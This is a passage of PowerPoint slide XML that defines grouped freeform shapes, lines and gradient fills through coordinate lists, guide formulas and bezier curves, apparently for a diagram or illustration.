                    <a:lnTo>
                      <a:pt x="0" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74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55" name="Freeform 1480"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4106" y="2672"/>
                <a:ext cx="229" cy="283"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1487 w 1487"/>
                  <a:gd name="T1" fmla="*/ 398 h 1841"/>
                  <a:gd name="T2" fmla="*/ 1487 w 1487"/>
                  <a:gd name="T3" fmla="*/ 1841 h 1841"/>
                  <a:gd name="T4" fmla="*/ 0 w 1487"/>
                  <a:gd name="T5" fmla="*/ 1443 h 1841"/>
                  <a:gd name="T6" fmla="*/ 0 w 1487"/>
                  <a:gd name="T7" fmla="*/ 0 h 1841"/>
                  <a:gd name="T8" fmla="*/ 0 w 1487"/>
                  <a:gd name="T9" fmla="*/ 0 h 1841"/>
                  <a:gd name="T10" fmla="*/ 1487 w 1487"/>
                  <a:gd name="T11" fmla="*/ 398 h 18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87"/>
                  <a:gd name="T19" fmla="*/ 0 h 1841"/>
                  <a:gd name="T20" fmla="*/ 1487 w 1487"/>
                  <a:gd name="T21" fmla="*/ 1841 h 184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87" h="1841">
                    <a:moveTo>
                      <a:pt x="1487" y="398"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1487" y="1841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="3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56" name="Freeform 1481"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4009" y="2955"/>
                <a:ext cx="97" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 636 w 636"/>
                  <a:gd name="T1" fmla="*/ 167 h 167"/>
                  <a:gd name="T2" fmla="*/ 0 w 636"/>
                  <a:gd name="T3" fmla="*/ 0 h 167"/>
                  <a:gd name="T4" fmla="*/ 636 w 636"/>
                  <a:gd name="T5" fmla="*/ 167 h 167"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 636"/>
                  <a:gd name="T10" fmla="*/ 0 h 167"/>
                  <a:gd name="T11" fmla="*/ 636 w 636"/>
                  <a:gd name="T12" fmla="*/ 167 h 16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36" h="167">
                    <a:moveTo>
                      <a:pt x="636" y="167"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="16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57" name="Line 1482"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="4009" y="2955"/>
                <a:ext cx="97" cy="26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58" name="Freeform 1483"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4009" y="2923"/>
                <a:ext cx="97" cy="58"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 636"/>
                  <a:gd name="T1" fmla="*/ 207 h 379"/>
                  <a:gd name="T2" fmla="*/ 0 w 636"/>
                  <a:gd name="T3" fmla="*/ 0 h 379"/>
                  <a:gd name="T4" fmla="*/ 636 w 636"/>
                  <a:gd name="T5" fmla="*/ 171 h 379"/>
                  <a:gd name="T6" fmla="*/ 636 w 636"/>
                  <a:gd name="T7" fmla="*/ 379 h 379"/>
                  <a:gd name="T8" fmla="*/ 0 w 636"/>
                  <a:gd name="T9" fmla="*/ 207 h 3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6"/>
                  <a:gd name="T16" fmla="*/ 0 h 379"/>
                  <a:gd name="T17" fmla="*/ 636 w 636"/>
                  <a:gd name="T18" fmla="*/ 379 h 37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6" h="379">
                    <a:moveTo>
                      <a:pt x="0" y="207"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20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59" name="Freeform 1484"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4009" y="2923"/>
                <a:ext cx="97" cy="58"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 636"/>
                  <a:gd name="T1" fmla="*/ 207 h 379"/>
                  <a:gd name="T2" fmla="*/ 0 w 636"/>
                  <a:gd name="T3" fmla="*/ 0 h 379"/>
                  <a:gd name="T4" fmla="*/ 636 w 636"/>
                  <a:gd name="T5" fmla="*/ 171 h 379"/>
                  <a:gd name="T6" fmla="*/ 636 w 636"/>
                  <a:gd name="T7" fmla="*/ 379 h 37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36"/>
                  <a:gd name="T13" fmla="*/ 0 h 379"/>
                  <a:gd name="T14" fmla="*/ 636 w 636"/>
                  <a:gd name="T15" fmla="*/ 379 h 37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36" h="379">
                    <a:moveTo>
                      <a:pt x="0" y="207"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="379"/>
                    </a:lnTo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60" name="Freeform 1485"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3650" y="2885"/>
                <a:ext cx="359" cy="96"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1545 w 2335"/>
                  <a:gd name="T1" fmla="*/ 5 h 627"/>
                  <a:gd name="T2" fmla="*/ 0 w 2335"/>
                  <a:gd name="T3" fmla="*/ 419 h 627"/>
                  <a:gd name="T4" fmla="*/ 0 w 2335"/>
                  <a:gd name="T5" fmla="*/ 627 h 627"/>
                  <a:gd name="T6" fmla="*/ 2335 w 2335"/>
                  <a:gd name="T7" fmla="*/ 0 h 627"/>
                  <a:gd name="T8" fmla="*/ 1545 w 2335"/>
                  <a:gd name="T9" fmla="*/ 5 h 6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35"/>
                  <a:gd name="T16" fmla="*/ 0 h 627"/>
                  <a:gd name="T17" fmla="*/ 2335 w 2335"/>
                  <a:gd name="T18" fmla="*/ 627 h 6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35" h="627">
                    <a:moveTo>
                      <a:pt x="1545" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2335" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1545" y="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61" name="Freeform 1486"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3771" y="2859"/>
                <a:ext cx="335" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2181"/>
                  <a:gd name="T1" fmla="*/ 414 h 585"/>
                  <a:gd name="T2" fmla="*/ 636 w 2181"/>
                  <a:gd name="T3" fmla="*/ 585 h 585"/>
                  <a:gd name="T4" fmla="*/ 2181 w 2181"/>
                  <a:gd name="T5" fmla="*/ 171 h 585"/>
                  <a:gd name="T6" fmla="*/ 1545 w 2181"/>
                  <a:gd name="T7" fmla="*/ 0 h 585"/>
                  <a:gd name="T8" fmla="*/ 0 w 2181"/>
                  <a:gd name="T9" fmla="*/ 414 h 5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81"/>
                  <a:gd name="T16" fmla="*/ 0 h 585"/>
                  <a:gd name="T17" fmla="*/ 2181 w 2181"/>
                  <a:gd name="T18" fmla="*/ 585 h 5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81" h="585">
                    <a:moveTo>
                      <a:pt x="0" y="414"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="636" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2181" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1545" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4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62" name="Freeform 1487"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3650" y="2859"/>
                <a:ext cx="219" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1426"/>
                  <a:gd name="T1" fmla="*/ 2 h 173"/>
                  <a:gd name="T2" fmla="*/ 636 w 1426"/>
                  <a:gd name="T3" fmla="*/ 173 h 173"/>
                  <a:gd name="T4" fmla="*/ 1426 w 1426"/>
                  <a:gd name="T5" fmla="*/ 168 h 173"/>
                  <a:gd name="T6" fmla="*/ 800 w 1426"/>
                  <a:gd name="T7" fmla="*/ 0 h 173"/>
                  <a:gd name="T8" fmla="*/ 0 w 1426"/>
                  <a:gd name="T9" fmla="*/ 2 h 1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26"/>
                  <a:gd name="T16" fmla="*/ 0 h 173"/>
                  <a:gd name="T17" fmla="*/ 1426 w 1426"/>
                  <a:gd name="T18" fmla="*/ 173 h 1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26" h="173">
                    <a:moveTo>
                      <a:pt x="0" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="636" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="800" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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63" name="Freeform 1488"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3994" y="2750"/>
                <a:ext cx="79" cy="164"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 512"/>
                  <a:gd name="T1" fmla="*/ 1067 h 1067"/>
                  <a:gd name="T2" fmla="*/ 0 w 512"/>
                  <a:gd name="T3" fmla="*/ 137 h 1067"/>
                  <a:gd name="T4" fmla="*/ 512 w 512"/>
                  <a:gd name="T5" fmla="*/ 0 h 1067"/>
                  <a:gd name="T6" fmla="*/ 512 w 512"/>
                  <a:gd name="T7" fmla="*/ 930 h 1067"/>
                  <a:gd name="T8" fmla="*/ 0 w 512"/>
                  <a:gd name="T9" fmla="*/ 1067 h 10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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 1067"/>
                  <a:gd name="T17" fmla="*/ 512 w 512"/>
                  <a:gd name="T18" fmla="*/ 1067 h 106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2" h="1067">
                    <a:moveTo>
                      <a:pt x="0" y="1067"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="106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64" name="Freeform 1489"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3916" y="2729"/>
                <a:ext cx="78" cy="164"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 511"/>
                  <a:gd name="T1" fmla="*/ 1068 h 1068"/>
                  <a:gd name="T2" fmla="*/ 0 w 511"/>
                  <a:gd name="T3" fmla="*/ 138 h 1068"/>
                  <a:gd name="T4" fmla="*/ 511 w 511"/>
                  <a:gd name="T5" fmla="*/ 0 h 1068"/>
                  <a:gd name="T6" fmla="*/ 511 w 511"/>
                  <a:gd name="T7" fmla="*/ 931 h 1068"/>
                  <a:gd name="T8" fmla="*/ 0 w 511"/>
                  <a:gd name="T9" fmla="*/ 1068 h 10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1"/>
                  <a:gd name="T16" fmla="*/ 0 h 1068"/>
                  <a:gd name="T17" fmla="*/ 511 w 511"/>
                  <a:gd name="T18" fmla="*/ 1068 h 10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1" h="1068">
                    <a:moveTo>
                      <a:pt x="0" y="1068"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="931"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="106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65" name="Freeform 1490"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3747" y="2684"/>
                <a:ext cx="66" cy="75"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="0" y="489"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="115"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="432" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="432" y="374"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="489"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="432" h="489">
                    <a:moveTo>
                      <a:pt x="0" y="489"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="489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hlink">
                      <a:gamma/>
                      <a:tint val="64706"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="hlink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sp>
            <p:nvSpPr>
              <p:cNvPr id="466" name="Freeform 1491"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3597" y="2643"/>
                <a:ext cx="66" cy="75"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="0" y="489"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="115"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="432" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="432" y="374"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="489"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="432" h="489">
                    <a:moveTo>
                      <a:pt x="0" y="489"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="489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hlink">
                      <a:gamma/>
                      <a:tint val="64706"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="hlink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charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="467" name="Line 1492"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="3989" y="2520"/>
                <a:ext cx="114" cy="181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68" name="Line 1493"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="3872" y="2489"/>
                <a:ext cx="113" cy="181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69" name="Line 1494"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="3757" y="2458"/>
                <a:ext cx="114" cy="181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0" name="Line 1495"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="3641" y="2427"/>
                <a:ext cx="114" cy="181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471" name="Group 780"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4357062" y="3089057"/>
              <a:ext cx="396875" cy="674687"/>
              <a:chOff x="-7292" y="1988"/>
              <a:chExt cx="888" cy="1514"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="472" name="Freeform 781"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7039" y="2434"/>
                <a:ext cx="0" cy="943"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 943 h 943"/>
                  <a:gd name="T1" fmla="*/ 0 h 943"/>
                  <a:gd name="T2" fmla="*/ 943 h 94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943">
                    <a:moveTo>
                      <a:pt x="0" y="943"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="943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3" name="Line 782"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="-7039" y="2434"/>
                <a:ext cx="0" cy="94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4" name="Freeform 783"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7048" y="2425"/>
                <a:ext cx="18" cy="961"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 8"/>
                  <a:gd name="T1" fmla="*/ 403 h 407"/>
                  <a:gd name="T2" fmla="*/ 0 w 8"/>
                  <a:gd name="T3" fmla="*/ 4 h 407"/>
                  <a:gd name="T4" fmla="*/ 4 w 8"/>
                  <a:gd name="T5" fmla="*/ 0 h 407"/>
                  <a:gd name="T6" fmla="*/ 4 w 8"/>
                  <a:gd name="T7" fmla="*/ 0 h 407"/>
                  <a:gd name="T8" fmla="*/ 8 w 8"/>
                  <a:gd name="T9" fmla="*/ 4 h 407"/>
                  <a:gd name="T10" fmla="*/ 8 w 8"/>
                  <a:gd name="T11" fmla="*/ 4 h 407"/>
                  <a:gd name="T12" fmla="*/ 8 w 8"/>
                  <a:gd name="T13" fmla="*/ 403 h 407"/>
                  <a:gd name="T14" fmla="*/ 4 w 8"/>
                  <a:gd name="T15" fmla="*/ 407 h 407"/>
                  <a:gd name="T16" fmla="*/ 4 w 8"/>
                  <a:gd name="T17" fmla="*/ 407 h 407"/>
                  <a:gd name="T18" fmla="*/ 0 w 8"/>
                  <a:gd name="T19" fmla="*/ 403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07">
                    <a:moveTo>
                      <a:pt x="0" y="40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03"/>
                      <a:pt x="8" y="403"/>
                      <a:pt x="8" y="403"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="405"/>
                      <a:pt x="6" y="407"/>
                      <a:pt x="4" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="407"/>
                      <a:pt x="4" y="407"/>
                      <a:pt x="4" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="407"/>
                      <a:pt x="0" y="405"/>
                      <a:pt x="0" y="4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5" name="Freeform 784"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7077" y="2137"/>
                <a:ext cx="340" cy="378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 340"/>
                  <a:gd name="T1" fmla="*/ 378 h 378"/>
                  <a:gd name="T2" fmla="*/ 340 w 340"/>
                  <a:gd name="T3" fmla="*/ 0 h 378"/>
                  <a:gd name="T4" fmla="*/ 0 w 340"/>
                  <a:gd name="T5" fmla="*/ 378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0" h="378">
                    <a:moveTo>
                      <a:pt x="0" y="378"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="340" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37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6" name="Line 785"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="-7077" y="2137"/>
                <a:ext cx="340" cy="37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7" name="Freeform 786"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7086" y="2125"/>
                <a:ext cx="361" cy="399"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 153"/>
                  <a:gd name="T1" fmla="*/ 168 h 169"/>
                  <a:gd name="T2" fmla="*/ 1 w 153"/>
                  <a:gd name="T3" fmla="*/ 162 h 169"/>
                  <a:gd name="T4" fmla="*/ 1 w 153"/>
                  <a:gd name="T5" fmla="*/ 162 h 169"/>
                  <a:gd name="T6" fmla="*/ 145 w 153"/>
                  <a:gd name="T7" fmla="*/ 2 h 169"/>
                  <a:gd name="T8" fmla="*/ 151 w 153"/>
                  <a:gd name="T9" fmla="*/ 2 h 169"/>
                  <a:gd name="T10" fmla="*/ 151 w 153"/>
                  <a:gd name="T11" fmla="*/ 2 h 169"/>
                  <a:gd name="T12" fmla="*/ 151 w 153"/>
                  <a:gd name="T13" fmla="*/ 8 h 169"/>
                  <a:gd name="T14" fmla="*/ 151 w 153"/>
                  <a:gd name="T15" fmla="*/ 8 h 169"/>
                  <a:gd name="T16" fmla="*/ 7 w 153"/>
                  <a:gd name="T17" fmla="*/ 167 h 169"/>
                  <a:gd name="T18" fmla="*/ 4 w 153"/>
                  <a:gd name="T19" fmla="*/ 169 h 169"/>
                  <a:gd name="T20" fmla="*/ 4 w 153"/>
                  <a:gd name="T21" fmla="*/ 169 h 169"/>
                  <a:gd name="T22" fmla="*/ 1 w 153"/>
                  <a:gd name="T23" fmla="*/ 168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3" h="169">
                    <a:moveTo>
                      <a:pt x="1" y="168"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="166"/>
                      <a:pt x="0" y="164"/>
                      <a:pt x="1" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="1" y="162"/>
                      <a:pt x="1" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="2"/>
                      <a:pt x="145" y="2"/>
                      <a:pt x="145" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="1"/>
                      <a:pt x="149" y="0"/>
                      <a:pt x="151" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="2"/>
                      <a:pt x="151" y="2"/>
                      <a:pt x="151" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="3"/>
                      <a:pt x="153" y="6"/>
                      <a:pt x="151" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="8"/>
                      <a:pt x="151" y="8"/>
                      <a:pt x="151" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="167"/>
                      <a:pt x="7" y="167"/>
                      <a:pt x="7" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="168"/>
                      <a:pt x="5" y="169"/>
                      <a:pt x="4" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="169"/>
                      <a:pt x="4" y="169"/>
                      <a:pt x="4" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="169"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="1" y="1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8" name="Freeform 787"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7292" y="2949"/>
                <a:ext cx="508" cy="553"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 215"/>
                  <a:gd name="T1" fmla="*/ 205 h 234"/>
                  <a:gd name="T2" fmla="*/ 191 w 215"/>
                  <a:gd name="T3" fmla="*/ 198 h 234"/>
                  <a:gd name="T4" fmla="*/ 117 w 215"/>
                  <a:gd name="T5" fmla="*/ 183 h 234"/>
                  <a:gd name="T6" fmla="*/ 117 w 215"/>
                  <a:gd name="T7" fmla="*/ 182 h 234"/>
                  <a:gd name="T8" fmla="*/ 117 w 215"/>
                  <a:gd name="T9" fmla="*/ 10 h 234"/>
                  <a:gd name="T10" fmla="*/ 107 w 215"/>
                  <a:gd name="T11" fmla="*/ 0 h 234"/>
                  <a:gd name="T12" fmla="*/ 97 w 215"/>
                  <a:gd name="T13" fmla="*/ 10 h 234"/>
                  <a:gd name="T14" fmla="*/ 97 w 215"/>
                  <a:gd name="T15" fmla="*/ 182 h 234"/>
                  <a:gd name="T16" fmla="*/ 97 w 215"/>
                  <a:gd name="T17" fmla="*/ 183 h 234"/>
                  <a:gd name="T18" fmla="*/ 24 w 215"/>
                  <a:gd name="T19" fmla="*/ 198 h 234"/>
                  <a:gd name="T20" fmla="*/ 0 w 215"/>
                  <a:gd name="T21" fmla="*/ 205 h 234"/>
                  <a:gd name="T22" fmla="*/ 20 w 215"/>
                  <a:gd name="T23" fmla="*/ 210 h 234"/>
                  <a:gd name="T24" fmla="*/ 83 w 215"/>
                  <a:gd name="T25" fmla="*/ 200 h 234"/>
                  <a:gd name="T26" fmla="*/ 97 w 215"/>
                  <a:gd name="T27" fmla="*/ 231 h 234"/>
                  <a:gd name="T28" fmla="*/ 107 w 215"/>
                  <a:gd name="T29" fmla="*/ 234 h 234"/>
                  <a:gd name="T30" fmla="*/ 119 w 215"/>
                  <a:gd name="T31" fmla="*/ 230 h 234"/>
                  <a:gd name="T32" fmla="*/ 132 w 215"/>
                  <a:gd name="T33" fmla="*/ 200 h 234"/>
                  <a:gd name="T34" fmla="*/ 195 w 215"/>
                  <a:gd name="T35" fmla="*/ 210 h 234"/>
                  <a:gd name="T36" fmla="*/ 215 w 215"/>
                  <a:gd name="T37" fmla="*/ 205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5" h="234">
                    <a:moveTo>
                      <a:pt x="215" y="205"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="198"/>
                      <a:pt x="191" y="198"/>
                      <a:pt x="191" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="182"/>
